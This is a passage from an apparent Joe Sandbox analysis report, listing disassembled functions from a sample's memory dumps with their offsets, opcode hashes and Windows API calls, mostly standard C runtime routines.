                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2698482322.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_144d000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: db67b15fb87ced9a1b18a3939559dd2ff416707fe0d2746cce78fc465d9a01ab
                                                                                                                                                                                                                                                        • Instruction ID: 20e1f60faac97e92494d3760d27f003a29eaaecfea9213ed82caf4bcd1358e79
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db67b15fb87ced9a1b18a3939559dd2ff416707fe0d2746cce78fc465d9a01ab
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C210375A04204DFEB15DF54D9C0B56BB65FBA8324F20C17EE9090B366C33AE456CAA2
                                                                                                                                                                                                                                                        Function 0144D110 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2698482322.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_144d000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 52c632737816cb798cbfe1af584ca5c422e1f8a307b188316b6a66db02345144
                                                                                                                                                                                                                                                        • Instruction ID: 21b19db17fa536dfda074f6dfab09e03e648a321515698a543b599a48216267b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52c632737816cb798cbfe1af584ca5c422e1f8a307b188316b6a66db02345144
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28212571A04240DFEB15DF54D9C0B17BF66FBA4320F24816AED090B366C336D856CBA2
                                                                                                                                                                                                                                                        Function 0145D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2698795335.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_145d000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 07b1add9e1c54abd0cfbdd039f0e2ad7b9ef8838529c20d6b3ad68a31c745b73
                                                                                                                                                                                                                                                        • Instruction ID: eb79dfb3792d6ba2bb30c1d52618bd73e157be98fd4b8402088fe3aedf07a11b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07b1add9e1c54abd0cfbdd039f0e2ad7b9ef8838529c20d6b3ad68a31c745b73
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D621FFB1A04200DFDB55DF54D984B16BBA1EF84628F20C56ADC0A4B3A7C33AD807CA62
                                                                                                                                                                                                                                                        Function 0145D005 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2698795335.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_145d000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 098aaaeedddfe2bf31aba2459e9941f2550964cbc32f65b02542695c040372b6
                                                                                                                                                                                                                                                        • Instruction ID: 34fe849b69bdc5407360a0e74a9bed1624bf97260138d3665d236c6aba29eede
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 098aaaeedddfe2bf31aba2459e9941f2550964cbc32f65b02542695c040372b6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA2183755083809FDB06CF64D994716BF71EF46214F28C5DAD8498F2A7C33A9806CB62
                                                                                                                                                                                                                                                        Function 0144D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2698482322.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_144d000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                                                                                                        • Instruction ID: 9a131206f2bf7e889c37f2b9933dc34c1d77b82fd442994cec64e15e8ef92870
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8711CD76904240CFDB06CF54D9C0B56BF62FB94324F2482AAD8090A266C33AE456CBA1
                                                                                                                                                                                                                                                        Function 0144D10B Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2698482322.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_144d000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                                                                                                        • Instruction ID: 9cba97c167b5afd00d7bca72f2f8d55b3176a4c513b902a244257dfbe58320d1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB11AF76904280CFDB16CF54D9C4B16BF72FB94324F2485AADD094B267C336D456CBA1
                                                                                                                                                                                                                                                        Function 0144D989 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2698482322.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_144d000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3bb99669489fcb33bd849ad930ff9802660cc15f5be55ba004e8ec2e61b98f47
                                                                                                                                                                                                                                                        • Instruction ID: 16399f9bc49b2dc93a476a7627ae03651e00f7d8ad9f3fc543e7120b45a97e79
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bb99669489fcb33bd849ad930ff9802660cc15f5be55ba004e8ec2e61b98f47
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28012B35804344ABF7205A95CCC4727BF99DF51225F08C51FED098B3D2C7349845CAB2
                                                                                                                                                                                                                                                        Function 0144D988 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2698482322.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_144d000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 76f99ac42f435d5be90f61e2e6d07ba5e4b5d4815aadbbe24338221733876cec
                                                                                                                                                                                                                                                        • Instruction ID: de5e559eee724ef7b1723f17a9fa3263d27cfeb381c05fb1daef32f537c94c35
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76f99ac42f435d5be90f61e2e6d07ba5e4b5d4815aadbbe24338221733876cec
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21F06271404344AFF7248A5AD884B67FF98EB91634F18C55FED488A2D7C2799844CAB1

                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                        Function 73CF77A6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(73CF8473,?,73CF777C,73CF8473,73D0BB20,0000000C,73CF78C4,73CF8473,00000002,00000000,?,73CF8473), ref: 73CF77C7
                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,73CF777C,73CF8473,73D0BB20,0000000C,73CF78C4,73CF8473,00000002,00000000,?,73CF8473), ref: 73CF77CE
                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 73CF77E0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                        • Opcode ID: 254c82bca6d2208c7dc29c435f38fafd25b0bffa207691e53568940b8ca2ebbc
                                                                                                                                                                                                                                                        • Instruction ID: db7813ced13e6cdb6025476fbd86558cdfaf2fb2bb1cf6c302dded6e3808d28f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 254c82bca6d2208c7dc29c435f38fafd25b0bffa207691e53568940b8ca2ebbc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46E04633100209AFCF42BFA2CA09B483BA9EF40A86F110014F90ADA521CB39ED52CB80
                                                                                                                                                                                                                                                        Function 73CF1100 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 114COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 73CF1125
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 73CF112E
                                                                                                                                                                                                                                                        • _fwprintf.LIBCONCRTD ref: 73CF1143
                                                                                                                                                                                                                                                          • Part of subcall function 73CF19B0: _fread.LIBCMTD ref: 73CF19CA
                                                                                                                                                                                                                                                        • _fwprintf.LIBCONCRTD ref: 73CF118A
                                                                                                                                                                                                                                                          • Part of subcall function 73CF1970: __vfwprintf_l.LIBCONCRTD ref: 73CF198A
                                                                                                                                                                                                                                                        • _fwprintf.LIBCONCRTD ref: 73CF11C2
                                                                                                                                                                                                                                                        • _fwprintf.LIBCONCRTD ref: 73CF11FC
                                                                                                                                                                                                                                                        • _fwprintf.LIBCONCRTD ref: 73CF1217
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fwprintf$CurrentProcess$__vfwprintf_l_fread
                                                                                                                                                                                                                                                        • String ID: <App>%s</App>$GetLogFile %s$GetLogFile: app is %s$GetLogFile: reusing file %s$Z:\syscalls\amsi%d_%d.amsi.csv
                                                                                                                                                                                                                                                        • API String ID: 1385254049-3731000926
                                                                                                                                                                                                                                                        • Opcode ID: 0e1b38fdb22d82a167b2cc5bedae21c1bf0881b9d880c34f5a14645b14cdff4b
                                                                                                                                                                                                                                                        • Instruction ID: dc6fb09a45175583ce71cafe67d32f130652e307c0f5d82a6206b1f88c9a9e40
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e1b38fdb22d82a167b2cc5bedae21c1bf0881b9d880c34f5a14645b14cdff4b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4141C6B3A00205BBEB44DBA0CD51BAE77789F40245F088118FD0AEF281E736EB54CB91
                                                                                                                                                                                                                                                        Function 73D0013E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(00000010,73CF1034,89000005,?,?,?,?,?,?,73D008B3,?,73CF1034,00000010,73CF1034,73CF1034), ref: 73D00180
                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 73D001FB
                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 73D00216
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,73CF1034,00000001,00000010,00000005,00000000,00000000), ref: 73D0023C
                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,00000010,00000000,73D008B3,00000000,?,?,?,?,?,?,?,?,?,73D008B3,?), ref: 73D0025B
                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,73D008B3,00000000,?,?,?,?,?,?,?,?,?,73D008B3,?), ref: 73D00294
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                                                                                                                        • Opcode ID: 36be5b4d6366eab29981a2ba35c72e7eddf67f1f947b6006bc16276735f924a8
                                                                                                                                                                                                                                                        • Instruction ID: 324a1af396418fa8ae6cfa79f7a0812e3552732b35747a8324af2007462118a4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36be5b4d6366eab29981a2ba35c72e7eddf67f1f947b6006bc16276735f924a8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13519672D00249AFDB00DFA4C855BDEBBF8EF09710F15411AE956F7281D7709A41CBA1
                                                                                                                                                                                                                                                        Function 73CFD398 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,73CF6612,73CF6612,?,?,?,73CFD5E9,00000001,00000001,2EE85006), ref: 73CFD3F2
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,73CFD5E9,00000001,00000001,2EE85006,?,?,?), ref: 73CFD478
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2EE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 73CFD572
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 73CFD57F
                                                                                                                                                                                                                                                          • Part of subcall function 73CF8389: HeapAlloc.KERNEL32(00000000,?,?,?,73CFAC07,00001000,?,?,73CF7182,?,73CF507C), ref: 73CF83BB
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 73CFD588
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 73CFD5AD
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3147120248-0
                                                                                                                                                                                                                                                        • Opcode ID: 0f519c8cccd5f71bcbf4362fa4ac743cc450e2548f179d958b7f7ba7f1920827
                                                                                                                                                                                                                                                        • Instruction ID: 85d8c03d26d2a03534b563d15b25a0d9918040ffdbe54aaf91ffd1cc9361cdc7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f519c8cccd5f71bcbf4362fa4ac743cc450e2548f179d958b7f7ba7f1920827
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A751D4B3600217AFEB569E64CC48FBF7BBAEB40654F194628FC06DA18CDB34DC418660
                                                                                                                                                                                                                                                        Function 73CFB76F Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9b238de48d221022f01950c4d4352e92c9c1346e48fd33ecc850901d07a68307
                                                                                                                                                                                                                                                        • Instruction ID: c17c6f0fc0e9afa9f8866148dd25060a9206061e371d90e71732fb86b097cafa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b238de48d221022f01950c4d4352e92c9c1346e48fd33ecc850901d07a68307
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD118473604217BBEB512FB7CD44B5F7A6DEFC5760B164669F81AD7284DB30880086B0
                                                                                                                                                                                                                                                        Function 73CF42A0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000001,?,73CF3F34,73CF1DC5,73CF1A0E,?,73CF1C1E,?,00000001,?,?,00000001,?,73D0BA60,0000000C,73CF1D07), ref: 73CF42AE
                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 73CF42BC
                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 73CF42D5
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,73CF1C1E,?,00000001,?,?,00000001,?,73D0BA60,0000000C,73CF1D07,?,00000001,?), ref: 73CF4327
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                        • Opcode ID: f27fc01a8fd4370b17a3bcd3cb4629841cba35aca5f3df21681ffac72be7c979
                                                                                                                                                                                                                                                        • Instruction ID: ffae25c6dde8a73571337cddcfa96caece34ba417f039ac5d12b512e12398766
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f27fc01a8fd4370b17a3bcd3cb4629841cba35aca5f3df21681ffac72be7c979
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E101F7332093335FF7953ABA9C84FAB2768EF05AB9376033AE125CD0D4EF2188188144
                                                                                                                                                                                                                                                        Function 73CF782B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,73CF77DC,73CF8473,?,73CF777C,73CF8473,73D0BB20,0000000C,73CF78C4,73CF8473,00000002), ref: 73CF784B
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 73CF785E
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,73CF77DC,73CF8473,?,73CF777C,73CF8473,73D0BB20,0000000C,73CF78C4,73CF8473,00000002,00000000), ref: 73CF7881
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                        • Opcode ID: ac85526f6514be6285a94381c758b52bc85ed5dff1266482e113e64f31a09a96
                                                                                                                                                                                                                                                        • Instruction ID: 9378592dd4f246ac616f5b492b8af79981e3131e3ed449231fdd48f887944b6e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac85526f6514be6285a94381c758b52bc85ed5dff1266482e113e64f31a09a96
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24F04F33A40209BFDB01AFE1C809BAEBFB8EB08B55F104165B84AF6140DB759995CA95
                                                                                                                                                                                                                                                        Function 73CF9F00 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                                                                                                                                        • Opcode ID: 2feed64a3656b14c358cf92e64dc7ae8e82efb5165160346c726e3061829813c
